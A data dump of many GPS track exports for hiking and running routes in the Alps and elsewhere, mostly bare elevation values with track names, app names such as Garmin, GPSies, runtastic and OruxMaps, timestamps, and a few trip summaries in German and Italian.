+ +1479.87 + + + +1495.03 + + + +1497.53 + + + +1503.57 + + + +1497.83 + + + +1502.52 + + + +1513.41 + + + +1519.5 + + + +1546.41 + + + +1573.01 + + + +1571.52 + + + +1612.58 + + + +1635.0 + + + +1634.22 + + + +1624.97 + + + +1647.97 + + + +1648.58 + + + +1660.06 + + + +1682.61 + + + +1701.54 + + + +1733.67 + + + +1720.74 + + + +1759.02 + + + +1800.17 + + + +1813.05 + + + +1842.01 + + + +1894.61 + + + +1901.26 + + + +1943.68 + + + +1958.67 + + + +1967.3 + + + +2037.05 + + + +2069.94 + + + +2090.17 + + + +2121.58 + + + +2124.01 + + + +2143.17 + + + +2160.55 + + + +2161.67 + + + +2206.17 + + + +2209.8 + + + +2229.05 + + + +2247.71 + + + +2260.58 + + + +2276.11 + + + +2294.3 + + + +2301.23 + + + +2314.05 + + + +2325.21 + + + +2356.19 + + + +2373.55 + + + +2404.53 + +" +" + + + + + + + +Monteisola + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Tourenplanung am 19. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 19. Juli 2016 + + + +274.0803 + + +273.96248 + + +275.02036 + + +276.50307 + + +279.13203 + + +281.29765 + + +289.2514 + + +290.28987 + + +292.01086 + + +299.6246 + + +303.47313 + + +306.50167 + + +315.36989 + + +318.61601 + + +330.33855 + + +331.15808 + + +344.08984 + + +332.9599 + + +347.10901 + + +346.96902 + + +349.17028 + + +354.35412 + + +365.05109 + + +373.73432 + + +381.22984 + + +389.55064 + + +399.23864 + + +404.66542 + + +442.02096 + + +487.20418 + + +482.56154 + + +485.06784 + + +487.97454 + + +432.0886 + + +433.88989 + + +408.57674 + + +401.14286 + + +395.15264 + + +374.9761 + + +372.32898 + + +361.64565 + + +353.06953 + + +343.89527 + + +345.68922 + + +343.3982 + + +333.12188 + + +332.65788 + + +324.62389 + + +317.94517 + + +311.56691 + + +309.85327 + + +309.19159 + + +293.87302 + + +291.54738 + + +285.21438 + + +283.62952 + + +283.13025 + + +285.38479 + + +285.10594 + + +283.24214 + + +281.10348 + + +273.11135 + + +273.76069 + + +276.93907 + + +278.1796 + + +274.0 +" +" + + + + + + +Garmin Connect + + +Dranse (Liddes) Corsa + +running + + +1332.4000244140625 + + + + + +1329.0 + + + + + +1325.4000244140625 + + + + + +1319.4000244140625 + + + + + +1312.199951171875 + + + + + +1292.4000244140625 + + + + + +1276.4000244140625 + + + + + +1271.800048828125 + + + + + +1273.199951171875 + + + + + +1274.800048828125 + + + + + +1280.199951171875 + + + + + +1294.800048828125 + + + + + +1333.5999755859375 + + + + + +1336.4000244140625 + + + + + +1357.4000244140625 + + + + + +1382.5999755859375 + + + + + +1413.0 + + + + + +1438.5999755859375 + + + + + +1448.199951171875 + + + + + +1452.0 + + + + + +1454.5999755859375 + + + + + +1467.199951171875 + + + + + +1470.800048828125 + + + + + +1476.199951171875 + + + + + +1479.0 + + + + + +1480.800048828125 + + + + + +1494.5999755859375 + + + + + +1521.0 + + + + + +1529.4000244140625 + + + + + +1533.199951171875 + + + + + +1552.5999755859375 + + + + + +1572.199951171875 + + + + + +1610.800048828125 + + + + + +1604.0 + + + + + +1597.199951171875 + + + + + +1588.0 + + + + + +1586.0 + + + + + +1581.5999755859375 + + + + + +1581.199951171875 + + + + + +1573.800048828125 + + + + + +1578.5999755859375 + + + + + +1583.0 + + + + + +1592.5999755859375 + + + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +883.0 + + + +904.0 + + + +915.0 + + + +920.0 + + + +946.0 + + + +949.0 + + + +960.0 + + + +956.0 + + + +980.0 + + + +986.0 + + + +997.0 + + + +998.0 + + + +992.0 + + + +1000.0 + + + +995.0 + + + +1000.0 + + + +1007.0 + + + +1012.0 + + + +1006.0 + + + +1013.0 + + + +1028.0 + + + +1027.0 + + + +1037.0 + + + +1059.0 + + + +1112.0 + + + +1117.0 + + + +1115.0 + + + +1122.0 + + + +1134.0 + + + +1129.0 + + + +1133.0 + + + +1141.0 + + + +1153.0 + + + +1163.0 + + + +1174.0 + + + +1174.0 + + + +1207.0 + + + +1224.0 + + + +1237.0 + + + +1231.0 + + + +1234.0 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +883.0 + + + +891.0 + + + +903.0 + + + +902.0 + + + +917.0 + + + +936.0 + + + +943.0 + + + +975.0 + + + +980.0 + + + +1002.0 + + + +1003.0 + + + +1007.0 + + + +1044.0 + + + +1046.0 + + + +1057.0 + + + +1067.0 + + + +1084.0 + + + +1144.0 + + + +1161.0 + + + +1183.0 + + + +1195.0 + + + +1207.0 + + + +1202.0 + + + +1194.0 + + + +1222.0 + + + +1234.0 + + + +1244.0 + + + +1296.0 + + + +1294.0 + + + +1315.0 + + + +1335.0 + + + +1398.0 + + + +1426.0 + + + +1450.0 + + + +1467.0 + + + +1481.0 + + + +1484.0 + + + +1504.0 + + + +1558.0 + + + +1581.0 + + + +1590.0 + + + +1596.0 + + + +1596.0 + + + +1600.0 + + + +1605.0 + + + +1608.0 + + + +1629.0 + + + +1655.0 + + + +1681.0 + + + +1711.0 + + + +1718.0 + + + +1723.0 + + + +1723.0 + +" +" + + + + + + +Garmin International + + + +160922-mm-wand-3000m-59min-125HM + + + + + + +278.0 + + + +275.0 + + + +269.0 + + + +272.0 + + + +286.0 + + + +301.0 + + + +290.0 + + + +269.0 + + + +276.0 + + + +293.0 + + + +289.0 + + + +278.0 + + + +271.0 + + + +285.0 + + + +296.0 + + + +289.0 + + + +288.0 + + + +270.0 + + + +272.0 + + + +270.0 + + + +273.0 + + + +272.0 + + + +277.0 + + + +279.0 + +" +" + + + + + + +Garmin International + + +2015-09-16 13:19:47 + + + + + + +1797.66 + + + +1796.36 + + + +1797.75 + + + +1797.5 + + + +1813.34 + + + +1834.99 + +" +" + + + +Federal Office of Topography Switzerland + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + +Gooseneck Lockout + + + +1440.0 + + + + + +0.000000 + +1439.0 + + + + + +2.397728 + +1441.0 + + + + + +7.760750 + +1452.0 + + + + + +9.942017 + +1458.0 + + + + + +4.994385 + +1464.0 + + + + + +7.079712 + +1464.0 + + + + + +3.648956 + +1466.0 + + + + + +1.642639 + +1464.0 + + + + + +8.596558 + +1463.0 + + + + + +2.645508 + +1460.0 + + + + + +8.176697 + +1453.0 + + + + + +6.428833 + +1443.0 + + + + + +9.906738 + +1440.0 + + + + + +1.986694" +" + + +Hegauer Kegelspiel ( VIII ) : "" Hewensteig "" + + + +2017 +http://www.runtastic.com + +runtastic + + + +Um deine Aktivitäten anzusehen gehe auf Runtastic.com + + +582.7000122070312 + + + +578.3699951171875 + + + +593.27001953125 + + + +603.8499755859375 + + + +627.8800048828125 + + + +636.0499877929688 + + + +658.1599731445312 + + + +667.77001953125 + + + +688.9199829101562 + + + +718.239990234375 + + + +748.0399780273438 + + + +751.8900146484375 + + + +767.27001953125 + + + +781.2100219726562 + + + +798.030029296875 + + + +821.5800170898438 + + + +828.3099975585938 + + + +831.6799926757812 + + + +837.4500122070312 + + + +845.6199951171875 + + + +848.5 + + + +861.47998046875 + + + +849.4600219726562 + + + +851.8699951171875 + + + +851.8699951171875 + + + +847.5399780273438 + + + +838.8900146484375 + + + +830.719970703125 + + + +829.27001953125 + + + +823.030029296875 + + + +812.4500122070312 + + + +785.0499877929688 + + + +777.3599853515625 + + + +756.6900024414062 + + + +740.3499755859375 + + + +711.510009765625 + + + +698.0499877929688 + + + +691.3300170898438 + + + +684.5999755859375 + + + +683.1500244140625 + + + +663.9299926757812 + + + +643.739990234375 + + + +638.9299926757812 + + + +591.3499755859375 + + + +567.7999877929688 + + + +575.969970703125 + + + +576.9299926757812 + + + +575.489990234375 + + + +574.530029296875 + + + +575.010009765625 + + + +583.1799926757812 + + + +602.4000244140625 + + + +612.02001953125 + + + +618.75 + + + +616.8200073242188 + + + +615.3800048828125 + + + +616.3400268554688 + + + +612.5 + + + +611.0599975585938 + + + +601.9199829101562 + + + +592.3099975585938 + + + +576.9299926757812 + +" +" + + + + + + +Garmin International + + + +2017-01-08 13:12:01 + + + + + + + + +572.62 + + + +574.14 + + + +579.98 + + + +586.08 + + + +585.81 + + + +584.96 + + + +576.87 + + + +581.76 + + + +579.32 + + + +580.91 + + + +579.57 + + + +568.52 + + + +557.35 + + + +555.58 + + + +538.07 + +" +" + + +tälle + + + + + + + + + +952.8 + + +958.9987592998352 + + +968.0219653179191 + + +994.3 + + +1004.3 + + +1010.4999349778083 + + +1008.900004654678 + + +1004.700021573092 + + +1010.1000861280388 + + +1016.9000737604028 + + +1019.6000030820687 + + +1025.1000348437276 + + +1034.1000250758887 + + +1041.3999661808673 + + +1050.900068565674 + + +1073.9000204466377 + + +1132.199832733072 + + +1181.4 + + +1193.6 + + +1208.6 + + +1243.399939888051 + + +1249.1000174955263 + + +1257.0999676666709 + + +1258.6 + + +1262.1000506573134 + + +1286.7001900592898 + + +1308.6998659139788 + + +1323.09983738552 + + +1343.1000190336008 + + +1365.0000321562231 + + +1378.5999514201467 + + +1401.099974727626 + + +1431.1000527883684 + + +1448.1 + + +1452.3999845046244 + + +1502.8 + + +1647.2 + + +1681.4077431536969 + + +1705.0 + + +1740.8 + + +1757.5 + + +1771.3 + + +1788.8 + + +1766.5 + + +1751.4197330791228 + + +1726.5 + + +1704.5 + + +1705.7 + + +1702.9407497161278 + + +1623.4 + + +1571.0 + + +1555.4 + + +1544.0 + + +1494.8997444341055 + + +1447.3 + + +1431.1000527891745 + + +1401.0999747279334 + + +1378.599951421546 + + +1365.0000321562231 + + +1343.1000190336 + + +1323.0998373870266 + + +1308.6998659139788 + + +1286.7001900592898 + + +1262.1000506573134 + + +1258.6 + + +1257.0999676666424 + + +1249.1000174954982 + + +1243.3999398880703 + + +1213.0000597798423 + + +1196.6000133316006 + + +1186.8999514138895 + + +1175.100012109621 + + +1132.1998327331103 + + +1073.900020446673 + + +1050.9000685657477 + + +1041.3999661808748 + + +1033.4000075107842 + + +1025.9000278749877 + + +1021.5000342927032 + + +1018.599999200235 + + +1010.100086128046 + + +1004.7000215730908 + + +1008.9000046546759 + + +1010.2999993299651 + + +1004.7 + + +995.1 + + +960.0 + + +956.0 +" +" + + + + + + +Garmin International + + +BOLLTT-14 14:21:59 + + + + + +819.18 + + + +828.79 + + + +843.69 + + + +908.58 + + + +919.64 + + + +927.81 + + + +945.11 + + + +948.96 + + + +969.63 + + + +979.72 + + + +984.05 + + + +995.1 + + + +1012.89 + + + +1018.17 + + + +1022.02 + + + +1048.94 + + + +1089.79 + + + +1101.81 + + + +1111.9 + + + +1122.48 + + + +1133.53 + + + +1139.3 + + + +1153.72 + + + +1175.83 + + + +1198.9 + + + +1200.34 + + + +1186.88 + + + +1182.56 + + + +1191.69 + + + +1216.69 + + + +1226.78 + + + +1269.08 + + + +1285.9 + + + +1295.51 + + + +1307.05 + + + +1211.88 + + + +1194.09 + + + +1193.13 + + + +1170.06 + + + +1142.66 + + + +1127.76 + + + +1114.79 + + + +1100.85 + + + +1069.12 + + + +1050.86 + + + +1047.49 + + + +1044.61 + + + +1016.73 + + + +986.93 + + + +948.48 + + + +935.5 + + + +896.57 + + + +891.76 + + + +892.24 + + + +893.68 + + + +888.4 + + + +882.15 + + + +874.94 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Pyramid Peak + +360gps + +360gps on GPSies.com +GPSiesUserOnWeb + + +Pyramid Peak on GPSies.com +trackOnWeb + + +round trip +1194.0 +13168.36025178009 +1824.0 +3007.0 +1124.0 + +Pyramid Peak on GPSies.com + +trackOnWeb + + +1885.0 + + + +1881.0 + + + +1875.0 + + + +1881.0 + + + +1894.0 + + + +1927.0 + + + +1945.0 + + + +1957.0 + + + +1974.0 + + + +1990.0 + + + +1998.0 + + + +2014.0 + + + +2040.0 + + + +2101.0 + + + +2143.0 + + + +2153.0 + + + +2226.0 + + + +2278.0 + + + +2297.0 + + + +2311.0 + + + +2338.0 + + + +2337.0 + + + +2333.0 + + + +2339.0 + + + +2350.0 + + + +2350.0 + + + +2349.0 + + + +2405.0 + + + +2435.0 + + + +2451.0 + + + +2472.0 + + + +2488.0 + + + +2616.0 + + + +2711.0 + + + +2777.0 + + + +2830.0 + + + +2857.0 + + + +2925.0 + + + +2969.0 + + + +3004.0 + + + +3007.0 + + + +2982.0 + + + +2855.0 + + + +2819.0 + + + +2801.0 + + + +2629.0 + + + +2580.0 + + + +2565.0 + + + +2548.0 + + + +2540.0 + + + +2530.0 + + + +2523.0 + + + +2423.0 + + + +2334.0 + + + +2317.0 + + + +2259.0 + + + +2205.0 + + + +2095.0 + + + +2068.0 + + + +2032.0 + + + +1851.0 + + + +1824.0 + + + +1838.0 + + + +1834.0 + + + +1866.0 + + + +1879.0 + + + +1882.0 + + + +1883.0 + + + +1884.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Domodossola + +Monika Teusch - Community + + + + + +Domodossola +Rundtour + + + +274.31732 + + +279.69073 + + +281.85973 + + +284.54894 + + +284.58732 + + +285.95715 + + +286.33786 + + +289.98692 + + +292.64999 + + +302.00236 + + +306.09865 + + +308.80188 + + +310.89603 + + +313.05613 + + +313.03587 + + +318.16095 + + +331.07102 + + +311.36596 + + +307.55663 + + +295.55157 + + +290.37705 + + +291.55264 + + +291.77661 + + +292.11427 + + +290.58607 + + +290.21015 + + +285.34816 + + +285.37911 + + +285.13145 + + +284.89686 + + +284.83391 + + +279.83003 + + +274.26701 +" +" + + + + + + +Garmin International + + +2015-10-13 11:43:42 + + + + + + +917.21 + + + +918.09 + + + +921.05 + + + +905.85 + + + +905.8 + + + +917.91 + + + +926.31 + + + +940.27 + + + +950.65 + + + +951.68 + + + +951.69 + + + +952.15 + + + +956.89 + + + +960.38 + + + +968.28 + + + +972.91 + + + +977.55 + + + +980.9 + + + +987.28 + + + +1008.46 + + + +1019.42 + + + +1020.36 + + + +1013.65 + + + +994.53 + + + +985.01 + + + +981.88 + + + +978.58 + + + +972.11 + + + +962.61 + + + +961.7 + + + +959.75 + + + +956.15 + + + +968.0 + + + +971.59 + + + +972.41 + + + +982.82 + + + +994.66 + + + +1006.44 + + + +1005.85 + + + +1002.44 + + + +996.0 + + + +988.92 + + + +982.76 + + + +975.37 + + + +960.01 + + + +951.97 + + + +950.18 + + + +945.4 + + + +944.48 + + + +929.3 + + + +921.48 + + + +918.88 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Blössling ( 1310m ) & Schweinekopf ( 1285m ) - I - + + + +2016 +http://www.runtastic.com + +runtastic + + + +Um deine Aktivitäten anzusehen gehe auf Runtastic.com + + +996.5399780273438 + + + +1007.1199951171875 + + + +1013.3699951171875 + + + +1020.0999755859375 + + + +1030.18994140625 + + + +1047.489990234375 + + + +1078.260009765625 + + + +1082.5799560546875 + + + +1090.27001953125 + + + +1096.52001953125 + + + +1099.8900146484375 + + + +1111.4200439453125 + + + +1120.0699462890625 + + + +1129.68994140625 + + + +1138.8199462890625 + + + +1150.8399658203125 + + + +1166.219970703125 + + + +1184.47998046875 + + + +1204.6700439453125 + + + +1215.719970703125 + + + +1240.719970703125 + + + +1255.1400146484375 + + + +1281.0899658203125 + + + +1291.6700439453125 + + + +1310.9000244140625 + + + +1312.3399658203125 + + + +1310.9000244140625 + + + +1293.1099853515625 + + + +1271.9599609375 + + + +1273.4000244140625 + + + +1252.25 + + + +1281.0899658203125 + + + +1285.9000244140625 + + + +1248.4100341796875 + + + +1270.0400390625 + +" +" + + +Watt Wanderung + +Monika Teusch - Community + + + + + +Watt Wanderung +27.8.2017 + + + +4.30729 + + +2.43974 + + +2.62526 + + +1.90037 + + +0.63038 + + +0.64141 + + +0.73704 + + +0.29514 + + +-0.46422 + + +0.22492 + + +-0.83866 + + +-0.09655 + + +-0.55563 + + +0.16884 + + +-0.78317 + + +-1.05682 + + +-1.56804 + + +-1.56286 + + +-1.23764 + + +-1.52755 + + +-1.1218 + + +-0.97316 + + +-1.01328 + + +-0.6188 + + +-0.8376 + + +0.11065 + + +-0.62781 + + +0.51817 + + +-0.18716 + + +0.144 + + +-0.07296 + + +-0.15694 + + +-0.43482 + + +-0.38543 + + +-0.22099 + + +0.46299 + + +3.63285 + + +4.14947 + + +3.04924 +" +" + + + + + + +Garmin International + + + +749 Hängebrücke Val Meltger + + + + + + +1347.1849 + + +1335.01108 + + +1327.60305 + + +1325.96565 + + +1321.99455 + + +1314.57798 + + +1311.68823 + + +1302.97071 + + +1305.22122 + + +1319.26292 + + +1331.03655 + + +1346.25138 + + +1357.29288 + + +1365.02325 + + +1380.13769 + + +1404.15719 + + +1415.52709 + + +1427.76581 + + +1428.98134 + + +1453.33901 + + +1446.26081 + + +1459.1141 + + +1472.55408 + + +1483.06518 + + +1490.69633 + + +1502.15222 + + +1518.81354 + + +1517.81167 + + +1521.38968 + + +1533.16311 + + +1541.53187 + + +1553.02775 + + +1555.22474 + + +1538.26695 + + +1576.93501 + + +1574.94622 + + +1570.52911 + + +1565.48797 + + +1570.32858 + + +1549.09939 + + +1547.32773 + + +1547.32773 + + +1516.52249 + + +1516.52249 + + +1528.13106 + + +1546.52192 + + +1560.29996 + + +1564.19011 + + +1578.0217 + + +1587.56583 + + +1594.75983 + + +1604.37918 + + +1609.01972 + + +1622.94833 + + +1632.43502 + + +1649.7542 + + +1628.12851 + + +1627.36978 + + +1618.7966 + + +1619.41281 + + +1609.18891 + + +1602.28485 + + +1575.12958 + + +1568.94424 + + +1565.45059 + + +1551.51665 + + +1539.89477 + + +1539.89477 + + +1524.72925 + + +1519.43886 + + +1514.8253 + + +1502.9662 + + +1491.07515 + + +1464.28897 + + +1467.93495 + + +1446.92132 + + +1422.2558 + + +1418.58673 + + +1410.91744 + + +1389.64004 + + +1381.65861 + + +1375.37514 + + +1367.09757 + + +1362.31493 + + +1349.05422 + + +1348.3 +" +" + + + + + + +Garmin International + + + +Track + + + + + + +2538.63 + + + +2535.89 + +" +" + + + + + + +Garmin International + + + +Aktueller Track: 29 NOV 2014 10:25 + + + + + + +561.0546875 + + +558.9296875 + + +557.4765625 + + +552.05859375 + + +539.44 + + + +537.51 + + + +528.38 + + + +527.9 + + + +528.38 + + + +528.86 + + + +528.86 + + + +529.34 + + + +530.79 + + + +532.71 + + + +529.34 + + + +533.19 + + + +535.11 + + + +535.11 + + + +530.3 + + + +530.79 + + + +529.82 + + + +529.82 + + + +531.27 + + + +537.03 + + + +538.96 + + + +540.4 + + + +538.48 + + + +539.44 + + + +539.92 + + + +539.44 + + + +539.92 + + + +539.92 + + + +541.36 + + + +550.97 + + + +551.93 + + + +551.93 + + + +551.45 + + + +539.44 + + + +536.55 + + + +527.9 + + + +525.02 + + + +533.67 + + + +542.32 + + + +554.34 + + + +530.79 + + + +531.27 + + + +532.71 + + + +539.92 + + + +541.84 + + + +557.7 + + + +569.24 + + + +575.49 + + + +575.01 + + + +562.99 + + + +558.66 + + + +560.11 + + + +561.07 + + + +563.95 + + + +565.39 + + + +567.8 + + + +562.51 + + + +561.55 + + + +563.47 + + + +564.43 + +" +" + + +eremo san grato + 25/ago/2015 13:58:34 + + +1854.0 + + +1796.0 + + +1786.0 + + +1799.0 + + +1786.0 + + +1791.0 + + +1796.0 + + +1782.0 + + +1779.0 + + +1770.0 + + +1781.0 + + +1755.0 + + +1775.0 + + +1782.0 + + +1772.0 + + +1800.0 + + +1782.0 + + +1766.0 + + +1765.0 + + +1766.0 + + +1759.0 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Jocau + + + + + +OruxMaps + + + +Jocau +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Jocau</h2><br /><p>Startzeit: 06/09/2016 12:20</p><p>Zielzeit: 06/09/2016 14:18</p><p>Strecke: 4,6km (01:57)</p><p>Bewegungszeit: 01:13</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,7km/h</p><p>Max. Geschwindigkeit: 11,9km/h</p><p>Minimale Höhe: 1275m</p><p>Maximale Höhe: 2052m</p><p>Steig-Geschw.: 420,8m/h</p><p>Sink-Geschw.: -339,7m/h</p><p>Aufstieg: 784m</p><p>Abstieg: -15m</p><p>Steigzeit: 01:51</p><p>Sinkzeit: 00:02</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1275.59 + + + +1296.93 + + + +1317.07 + + + +1322.45 + + + +1331.23 + + + +1341.17 + + + +1349.43 + + + +1366.02 + + + +1410.7 + + + +1436.54 + + + +1458.56 + + + +1458.96 + + + +1467.7 + + + +1466.75 + + + +1471.55 + + + +1481.55 + + + +1481.56 + + + +1480.65 + + + +1485.08 + + + +1478.06 + + + +1497.55 + + + +1519.39 + + + +1538.01 + + + +1592.2 + + + +1602.53 + + + +1626.18 + + + +1655.04 + + + +1658.14 + + + +1701.61 + + + +1715.08 + + + +1730.91 + + + +1756.47 + + + +1778.08 + + + +1828.27 + + + +1838.38 + + + +1840.55 + + + +1863.71 + + + +1890.52 + + + +1879.38 + + + +1907.42 + + + +1928.8 + + + +1969.75 + + + +2016.05 + + + +2048.05 + +" +" + + + + + + + +2014-07-19T06:53:37Z + + + +1087.0 + + + +1089.4000244 + + + +1108.8000488 + + + +1113.4000244 + + + +1112.8000488 + + + +1108.1999512 + + + +1104.0 + + + +1106.8000488 + + + +1113.0 + + + +1127.8000488 + + + +1131.0 + + + +1133.8000488 + + + +1138.5999756 + + + +1148.0 + + + +1153.8000488 + + + +1175.1999512 + + + +1187.4000244 + + + +1208.5999756 + + + +1219.8000488 + + + +1237.5999756 + + + +1275.0 + + + +1313.5999756 + + + +1327.0 + + + +1342.0 + + + +1352.1999512 + + + +1370.1999512 + + + +1373.0 + + + +1370.5999756 + + + +1367.1999512 + + + +1357.8000488 + + + +1357.0 + + + +1361.0 + + + +1371.0 + + + +1379.8000488 + + + +1391.5999756 + + + +1382.5999756 + + + +1377.1999512 + + + +1380.8000488 + + + +1384.5999756 + + + +1382.5999756 + + + +1380.4000244 + + + +1384.1999512 + + + +1388.1999512 + + + +1409.5999756 + + + +1415.1999512 + + + +1418.0 + + + +1420.1999512 + + + +1422.1999512 + + + +1425.8000488 + + + +1428.0 + + + +1431.0 + + + +1420.5999756 + + + +1427.8000488 + + + +1425.0 + + + +1424.8000488 + + + +1414.5999756 + + + +1404.1999512 + + + +1401.1999512 + + + +1403.0 + + + +1414.0 + + + +1428.1999512 + + + +1431.0 + +" +" + + +abstieg + + + + + +OruxMaps + + + +abstieg +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: abstieg</h2><br /><p>Startzeit: 06/29/2015 17:14</p><p>Zielzeit: 06/29/2015 19:52</p><p>Strecke: 7,8km (02:37)</p><p>Bewegungszeit: 01:48</p><p>Ø-Geschwindigkeit: 3km/h</p><p>Netto-Geschwindigkeit: 4,4km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 1894m</p><p>Maximale Höhe: 2681m</p><p>Steig-Geschw.: 263m/h</p><p>Sink-Geschw.: -453,4m/h</p><p>Aufstieg: 127m</p><p>Abstieg: -912m</p><p>Steigzeit: 00:29</p><p>Sinkzeit: 02:00</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2681.1 + + + +2677.63 + + + +2629.2 + + + +2560.26 + + + +2534.6 + + + +2492.89 + + + +2482.46 + + + +2486.03 + + + +2484.1 + + + +2461.92 + + + +2409.97 + + + +2309.0 + + + +2294.63 + + + +2228.72 + + + +2193.73 + + + +2083.48 + + + +2101.5 + + + +2107.6 + + + +2121.57 + + + +2139.46 + + + +2148.13 + + + +2124.1 + + + +2116.46 + + + +2116.03 + + + +2107.06 + + + +2087.79 + + + +2075.13 + + + +2072.18 + + + +2069.99 + + + +2073.11 + + + +2071.72 + + + +2048.22 + + + +2041.25 + + + +2044.6 + + + +2051.1 + + + +2059.6 + + + +2069.09 + + + +2073.09 + + + +2073.59 + + + +2062.72 + + + +2054.6 + + + +2038.73 + + + +2035.47 + + + +2005.97 + + + +2001.6 + + + +1981.1 + + + +1969.22 + + + +1949.1 + + + +1936.22 + + + +1917.72 + + + +1903.04 + + + +1894.61 + +" +" + + + + + + +Garmin International + + + +2014-03-16 16:38:18 +Data 16/03/2014, escursione leggera con Sara. +Dall'Alpe Tedesco al Monte Minisfreddo passando per il Poncione di Ganna e viceversa (quasi tutto sullo stesso percorso, ma al ritorno non si è passati sulla vetta del Poncione). + + + + + + + + +748.07 + + + +758.15 + + + +768.39 + + + +796.5 + + + +805.08 + + + +822.99 + + + +839.97 + + + +870.48 + + + +879.11 + + + +901.75 + + + +921.5 + + + +988.96 + + + +989.19 + + + +982.64 + + + +946.07 + + + +918.58 + + + +930.13 + + + +945.97 + + + +975.49 + + + +977.91 + + + +982.78 + + + +1000.89 + + + +1019.09 + + + +1016.95 + + + +1023.64 + + + +1023.2 + + + +1020.52 + + + +1019.12 + + + +1027.5 + + + +1035.87 + + + +1005.17 + + + +983.74 + + + +977.91 + + + +946.58 + + + +930.8 + + + +920.01 + + + +904.34 + + + +899.07 + + + +899.39 + + + +898.69 + + + +887.19 + + + +884.4 + + + +872.03 + + + +867.96 + + + +841.04 + + + +826.27 + + + +811.85 + + + +799.99 + + + +774.2 + + + +759.63 + + + +752.61 + + + +748.35 + + + +741.13 + +" +" + + + + + + +Garmin International + + + +Tracé actuel: 20 JUIL 2014 14:15 002 001 + + + + + + +15.609375 + + + +25.25390625 + + + +50.25 + + + +72.96484375 + + + +147.2578125 + + + +159.18359375 + + + +198.328125 + + + +218.25390625 + + + +231.76171875 + + + +280.8984375 + + + +293.3984375 + + + +302.37109375 + + + +301.84765625 + + + +310.75390625 + + + +321.546875 + + + +322.26953125 + + + +346.05859375 + + + +347.10546875 + + + +376.85546875 + + + +403.515625 + + + +414.20703125 + + + +425.08984375 + + + +432.12109375 + + + +460.19921875 + + + +475.86328125 + + + +530.015625 + + + +550.0703125 + + + +559.6015625 + + + +556.4453125 + + + +578.0 + + + +558.6796875 + + + +530.6796875 + + + +498.640625 + + + +500.265625 + + + +473.65625 + + + +457.890625 + + + +432.2109375 + + + +424.0703125 + + + +413.03125 + + + +403.84765625 + + + +377.2421875 + + + +347.359375 + + + +336.98046875 + + + +323.53125 + + + +322.2109375 + + + +315.05859375 + + + +312.59375 + + + +302.265625 + + + +295.1484375 + + + +281.51171875 + + + +237.875 + + + +219.60546875 + + + +195.4296875 + + + +163.0703125 + + + +157.09375 + + + +145.578125 + + + +75.4609375 + + + +46.50390625 + + + +15.86328125 + +" +" + + +Tourenplanung am 18. März 2017 + +Holger Stein - Community + + + + + +Tourenplanung am 18. März 2017 + + + +49.9 + + +50.2 + + +53.2 + + +31.4 + + +9.0 + + +14.1 + + +4.9 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +2016-06-07 12:32:41 + + + +505.31 + + +508.19 + + +511.56 + + +521.17 + + +550.01 + + +566.83 + + +577.41 + + +588.95 + + +606.73 + + +620.19 + + +627.88 + + +659.12 + + +671.62 + + +683.15 + + +689.88 + + +696.13 + + +709.11 + + +716.32 + + +734.1 + + +750.45 + + +756.69 + + +763.42 + + +767.75 + + +784.57 + + +795.15 + + +806.68 + + +809.09 + + +822.06 + + +838.89 + + +848.5 + + +851.87 + + +855.71 + + +861.96 + + +864.84 + + +870.61 + + +883.11 + + +895.12 + + +909.54 + + +913.87 + + +953.28 + + +968.18 + + +993.18 + + +997.99 + + +1016.73 + + +1021.06 + + +1029.71 + + +1040.76 + + +1040.28 + + +1045.09 + + +1077.78 + + +1098.92 + + +1110.46 + + +1121.52 + + +1147.47 + + +1151.8 + + +1156.12 + + +1169.1 + + +1193.61 + + +1202.75 + + +1211.4 + + +1241.68 + + +1249.85 + + +1253.7 + + +1263.79 + + +1304.65 + + +1312.34 + + +1334.93 + + +1353.19 + + +1360.88 + + +1369.54 + + +1383.96 + + +1391.65 + + +1400.3 + + +1423.85 + + +1437.31 + + +1444.04 + + +1484.41 + + +1497.39 + + +1502.2 + + +1517.1 + + +1538.25 + + +1562.76 + + +1586.31 + + 